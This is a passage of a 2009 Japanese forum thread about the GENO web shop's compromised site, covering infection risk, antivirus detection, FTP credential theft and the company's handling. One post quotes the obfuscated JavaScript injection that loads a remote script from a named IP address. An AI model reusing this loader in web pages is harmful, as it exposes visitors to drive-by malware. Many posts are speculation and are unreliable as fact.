とりあえず感染の可能性が高いケースを暫定的にまとめておく ・Windows 2000/XP(Vista、Mac、Linuxは除くが、最初に感染サイトに2000/XPでアクセスしている場合は危険性あり。Me以下は知らない) ・Adobe Reader 8.1.1以下を使用、またはFlash Player 9.0.115.0以下を使用 ・JavaScriptを有効にしている 以上の全てに当てはまる人は複数のアンチウィルスソフトでスキャン、もしくはリカバリおすすめ
900 :
サポナリア(関東地方) :2009/04/08(水) 02:27:22.24 ID:TXqYAd/K
GENOのサイトでウイルス感染 業務再開するもウィルスの件は一切触れず ★9
GENOのサイトでGenocide★128
903 :
水芭蕉(catv?) :2009/04/08(水) 02:28:49.41 ID:D/08ujAY
Opera最強伝説って入れろよ
904 :
藤(東京都) :2009/04/08(水) 02:31:37.10 ID:VYlkbx2V
これだけ被害が広がってるってことは感染したクライアントから サーバーにアタックをかけてサイトを書き換えるタイプのウィルスかな?
事前対応/事後対応のどちらかをまとめてくれ。 AntiVir(無料)・・・検出するがなにもできず。事後対応済み。無料かは知らん avast(無料)・・・ AVG(無料)・・・検出するがなにもできず。無料かは知らん BitDefender・・・ マカフィー・・・ カスペルスキー・・・検出しない。事後対応済み。 ノートン・・・対応済み。事前かは知らん バスター・・・ NOD(ESET)・・・
906 :
トベラ(埼玉県) :2009/04/08(水) 02:32:50.78 ID:7e0u8bxX
QCPASSとGENOアウトレットを放置ってどういうこと? 同罪なのに
今日の特化品が普通に売れてる 結構と気にしてない奴多いのか 俺たち敗北!?
908 :
フリージア(東京都) :2009/04/08(水) 02:35:52.93 ID:3FM9FGnp BE:332986144-BRZ(10000)
ネットショップ「GENO」でウイルス感染 業務再開するもGENOサイドは「キャッシュ消せ」とふざけた対応★9
これでいいか
909 :
ジンチョウゲ(dion軍) :2009/04/08(水) 02:37:44.63 ID:WcsaUurT
ネットショップ「GENO」でウイルス感染 業務再開するも「キャッシュ消せ」とふざけた対応★9 こっちの方がいい
910 :
ヤマボウシ(神奈川県) :2009/04/08(水) 02:38:02.55 ID:8R7h3Usi
911 :
オニタビラコ(アラバマ州) :2009/04/08(水) 02:38:40.68 ID:uklzKC3H
>>908 いいんじゃない?「GENO」などってしたほうがいいかと思うけど。文字数制限に絡むかな。
912 :
コブシ(千葉県) :2009/04/08(水) 02:38:58.86 ID:/Euywwyx
>>904 鯖にアタック掛ける部分に関してもウィルスなのかどうかまでは
まだわかんないんじゃないかな。
結局感染した鯖を詳細に解析しないとその辺を調査するのは難しいと思うよ。
誰かジャンクのMacでも持ってる奴が居ればGenoと同じくらい古いOSから何から入れて
Genoのボロ鯖をシミュレートして、
DDNSで外向きで囮鯖立ててアタックを待つと面白いかも知れない。
913 :
フリージア(東京都) :2009/04/08(水) 02:42:23.47 ID:3FM9FGnp BE:249739643-BRZ(10000)
たててきた
しかしラトビアで何をしているのか気になる
島根県とIDが被った 俺も何かに感染したか
917 :
オニタビラコ(アラバマ州) :2009/04/08(水) 02:45:41.28 ID:uklzKC3H
で、もうサイトは無害なの?
919 :
カンガルーポー(島根県) :2009/04/08(水) 02:50:57.61 ID:+dhcGarc
920 :
コブシ(千葉県) :2009/04/08(水) 02:50:58.48 ID:/Euywwyx
>>918 もう無害とかじゃなくて
また書きかえられちゃう可能性があるから
油断できないって話。
さっきおいらがスレの↑の方で張られたUSBメモリのページにアクセスした時は大丈夫だったけど。
つまり、「二度ある事は三度ある」になるか、「三度目の正直」になるかは神のみぞ知るって事ですよ。
921 :
ニオイタチツボスミレ(沖縄県) :2009/04/08(水) 02:53:40.03 ID:zJ5JGqS1
GENOは仏の顔も三度までって言葉をよく考えるといいよ
922 :
コデマリ(東海) :2009/04/08(水) 02:54:50.42 ID:Qa1Lah5l
感染したわけじゃないけどクリーンインスコしたら清々しい気分になった
923 :
モクレン(東京都) :2009/04/08(水) 02:55:08.48 ID:XubYCF92
実際被害は確認できてないよな
924 :
クンシラン(兵庫県) :2009/04/08(水) 02:55:16.18 ID:iO105L3i
諸事情でウイルスバスターしか使えないんだけどやっぱりバスターじゃ検出しないよな? はー…どうしよう
>>912 Mac以外のサーバも感染してるんでSQLインジェクションとか
Webアプリへのアタックをうたがったほうがいいかんじだよ
>>924 ごめん
目が狂ってた
ノートンとまちがえてたわ><
なんか今なんでもない普通のページでウイルス反応でてびびった FLASH使ってるし
バスターは誤検出したり問題あったみたいだけど今は対応したんじゃなかったっけ?
933 :
ベニバナヤマボウシ(長屋) :2009/04/08(水) 03:14:30.61 ID:lcfnkj4Z
>925 さっき送ったよ、メインPCはカスペなのでサブPC起動したら検知しなかったので。
genoって中古を新品として売るようなバッタ物屋だしなぁ おかげでリカバリする羽目になったお 潰れろ
936 :
ベニバナヤマボウシ(長屋) :2009/04/08(水) 03:21:42.94 ID:lcfnkj4Z
>934 >現時点では対策ソフトでの駆除はできません。
938 :
サポナリア(catv?) :2009/04/08(水) 03:23:07.37 ID:o8yihpl5
落とすたびMD5が変わるの何でだろね
940 :
ベニバナヤマボウシ(長屋) :2009/04/08(水) 03:25:43.14 ID:lcfnkj4Z
>938 サーバーで自動生成してるんじゃね?
941 :
コブシ(千葉県) :2009/04/08(水) 03:25:45.48 ID:/Euywwyx
>>926 なんかプラットフォーム依存って感じじゃないみたいだね。
もしかするとSQLインジェクションやCMS側の穴などを突かれているのかも知れないね。
なんか今 94.247.2.195/jquery.js でぐぐってみたけど、
中国方面なんかでもこのid=ほにゃららの書き換えでハックされたのかどうかの
教えてGoo!的な書き込みが散見されるね。
それも3/28あたりからの書き込みばかり。
>>938 バージョンうpとかもあるかもしれないけど
一部のファイルをランダム生成みたいな機構があるのかもね
難読化目的とかかなあ
943 :
オニタビラコ(アラバマ州) :2009/04/08(水) 03:29:17.76 ID:uklzKC3H
>>941 ということは28日あたりにすでに仕込まれていて、
大量のトラフィックがあったが故にサイトが激重だった可能性があると?
>>934 さすがに何をやってくるのかまでは分からないか
突然重くなったのだとしたらそういう攻撃が続いてたのかもしれないね だいたいああいうのってゾンビ使って大量アタックしかけそうだし
947 :
コブシ(千葉県) :2009/04/08(水) 03:34:21.03 ID:/Euywwyx
>>943 その可能性もゼロじゃないと思う。
結局発症日時に関してはGenoがまともに調べて
本当に4日以前には書き換えられていなかったかどうかを
完全に証明してくれないと何ともいえないよ。
ぶっちゃけ、スレに書かれている事をそのまま纏めて稚拙なお詫びと共に書き記しているだけにしか見えないから
本気でログ掘ってチェックしているかどうかすら甚だ疑問だよ。
948 :
コブシ(千葉県) :2009/04/08(水) 03:36:08.80 ID:/Euywwyx
まったく終わってんなぁw 久々に朝が楽しみだ。
950 :
ヤエザクラ(東京都) :2009/04/08(水) 03:37:42.25 ID:2q2Z2uvM
GENOでもう買わない じゃなくて、見にすら行けないなw
お詫びセールマダァ-? (・∀・ )っ/凵⌒☆チンチン
この騒動のせいで、張られたURL全然踏めなくなった。。 いつになったら解決すんだよ。。その割なんかIT系サイトでも扱い小さいし。。
954 :
サポナリア(catv?) :2009/04/08(水) 03:41:36.77 ID:o8yihpl5
リロードしてなかった もろかぶりすまん><
957 :
コブシ(千葉県) :2009/04/08(水) 03:44:18.97 ID:/Euywwyx
あ、てか、Geno鯖のIPであった漏れ串疑惑の件はどうなったんだろ? 少なくても2ch側では焼かれているから2ch書き込み用には使えない筈だけど。 逆に未だに漏れ串として使えちゃうのなら未だに穴あきまくりって事に他ならないけど。 だれかポートスキャンなり、チェックした奴いる?
958 :
コブシ(千葉県) :2009/04/08(水) 03:46:02.63 ID:/Euywwyx
959 :
アグロステンマ アゲラタム(東京都) :2009/04/08(水) 03:47:27.74 ID:6aPfNErr
>>934 これが企業としての本来の対応だよね
GENOは見習うべき
無理だろうけど
960 :
ノボロギク(長崎県) :2009/04/08(水) 03:51:14.85 ID:idbp3JFq
>>951 ということはマスコミの記事(impress)がうそだったんですね。
そっちに抗議送ります とかメールしてみてはどうだろう。
962 :
クワガタソウ(東海) :2009/04/08(水) 03:57:12.63 ID:AkP+BPY7
海外では少し前から改ざん被害があったのにアンチウィルスが 対応してなかったのはマルウェアばらまき開始までにタイムラグがあったのかな 寝る前にふと思った。おやすみなさい。
963 :
ノボロギク(長崎県) :2009/04/08(水) 04:00:22.90 ID:idbp3JFq
なんでケーブル抜いて電源落とさないんだ?気がついてないってこと? 改ざんされた現在も普通に発注入ってるのかな?
965 :
ジンチョウゲ(dion軍) :2009/04/08(水) 04:08:52.71 ID:WcsaUurT
>>964 気がついてる
が、売り上げを落としたくないから放置
>>954 これじゃどれが検知できるウイルス対策ソフトかいえないよなあ・・・。
やっぱりパッカーで何種類かあるのか?
これを機会にAVGからavastにしてみた。 使いづらいけど、すぐに慣れると思う。
ようやくAVIRAで検出出来るようになったけど、 駆除までは出来ないね。 というかまだどこも駆除までは出来て居ない感じだけど。 亜種も出てきそうだし、踏んだら死を待つかOS再インストールの脅威はまだ残っているのか・・・。
おまいらおはよう 踏まずにスレ1からにニヤニヤしてみてたけどリアルで病気になった(´Д`)
中国フランスアメリカのフォーラムによると FTPを使うとIDとパスを感染元に送る可能性があると書かれてるね 抜かれたら改竄されて、改竄サイトを見た人が2次感染という仕組みか 対策としてはOS再インスコがあげられてたは… ということは
なんのIDとパスよ
二次感染した方の被害は? まだラトビアに何か送信してるって事しか分からないのか
975 :
プリムラ(catv?) :2009/04/08(水) 06:08:52.47 ID:99EypeXF
どうしたおまいら!?勢いが急速に衰えてるぞ! 新学期がはじまったからか?そんなにニュー速って学生多いのか!?
2ちゃん見てる奴なんて学生くらいだろ
977 :
パンジー(コネチカット州) :2009/04/08(水) 06:18:58.42 ID:BWWgypYC
CMSでサイト管理しててもやばいって事?
978 :
ジョウシュウアズマギク(大阪府) :2009/04/08(水) 06:22:15.84 ID:6D9iz6jy
今知った。サイトにあるようにキヤッシュ消した。 カスペルしたら感染してる・・・ 履歴を消したら、Geno経由で感染した証拠もなくなるじゃないか。 まじで酷くないか?
979 :
トベラ(catv?) :2009/04/08(水) 06:23:09.78 ID:QPknj9je
プロバイダにアクセス履歴が残ってるはず
>>955 にもあるけど
>694 名前: フリージア(東京都)[sage] 投稿日:2009/04/07(火) 08:09:42.90 ID:aQV3b+FB
>Genoの.jsなんだが
><!--
>document.write(unescape('%3CsoQcripB9tmO%20smOrc%3DB9%2F%2F94tNt%2EtNt2fq4YMj7tNt%2Ew22YMj%2E19N65rz0%2FjqueryB9%2EmOjoQs%3EBn%3C%2FsmOctNtriN6ptNttYMj%3E').replace(/w2|oQ|YMj|fq|rz0|B9|tNt|N6|Bn|mO/g,""));
>-->
>なんだよこれ、ウィルス復旧してんじゃねぇかw
>ファイルを元に戻しただけで、そもそもの外部からの侵入口は開いたままだったのかwww
最初の鯖復旧から別のコードになってってことは
とりあえずgenoがftpハックされっぱだったのは確実じゃね
で、GENOはもうウィスル排除できたの?
982 :
ツメクサ(愛知県) :2009/04/08(水) 06:27:04.40 ID:0uOJ/yxE
ゲノ自体がウィルスのように見えてきました^^;
お聞きしたいのですがフォーマットしないで リカバリ領域からのリカバリじゃ意味ないんでしょうか?
985 :
ツメクサ(愛知県) :2009/04/08(水) 06:40:59.34 ID:0uOJ/yxE
はよ、次スレたてておくれ('A`)
前にFC2なんかの個人ブログがやられまくった時の個人の対応より酷すぎるだろw 放置垢以外は消すなり、ロックかけたりしてたしなー
987 :
ジョウシュウアズマギク(大阪府) :2009/04/08(水) 06:45:07.23 ID:6D9iz6jy
988 :
菜の花(catv?) :2009/04/08(水) 06:50:33.91 ID:dbZ3xWwK
お前らがいるから2chを安全に楽しめる
989 :
パンジー(コネチカット州) :2009/04/08(水) 07:00:22.44 ID:BWWgypYC
システムの復元してウイルスチェックもしたけど不安が消えねー フォーマットは絶対したくねえ 胃が痛い
今履歴調べたら4/3の18時にアクセスしてたギリギリセーフか
991 :
モッコウバラ(石川県) :2009/04/08(水) 07:17:32.77 ID:b1Lp+f0/
GENOサイド
>>990 でも審判にはアウトと言われ、ブラウン監督と共に退場
今起床した。GENOの対応ワロスww
994 :
サンシュ(大阪府) :2009/04/08(水) 07:27:18.68 ID:IWkRDcir
995 :
ジョウシュウアズマギク(大阪府) :2009/04/08(水) 07:38:42.99 ID:6D9iz6jy
958 :[Fn]+[名無しさん]:2009/04/05(日) 01:46:48 ID:kDmqdJ/4 昨日の10時頃からみたいだけど? 959 :[Fn]+[名無しさん]:2009/04/05(日) 01:56:25 ID:DhrYIPH5 確実感染なのはそうみたいだね。ウイルスは本物の新種みたいだ。 2日付で発見された新種の亜種だとか。それはソフトは無力になるなー。 なぜGENOみたいなマイナーサイト狙ったんだろ。もっと大手なら大変なことに
996 :
モッコウバラ(石川県) :2009/04/08(水) 07:47:01.04 ID:b1Lp+f0/
997 :
プリムラ・マラコイデス(東京都) :2009/04/08(水) 07:47:34.24 ID:U8LtmWqj
普通に営業再開しててワロタ
998 :
トベラ(catv?) :2009/04/08(水) 07:59:01.69 ID:QPknj9je
u
999 :
フモトスミレ(アラバマ州) :2009/04/08(水) 07:59:19.41 ID:fCqxdq4Y
1000ならGENO破産
1000ならGENO倒産
1001 :
1001 :
Over 1000 Thread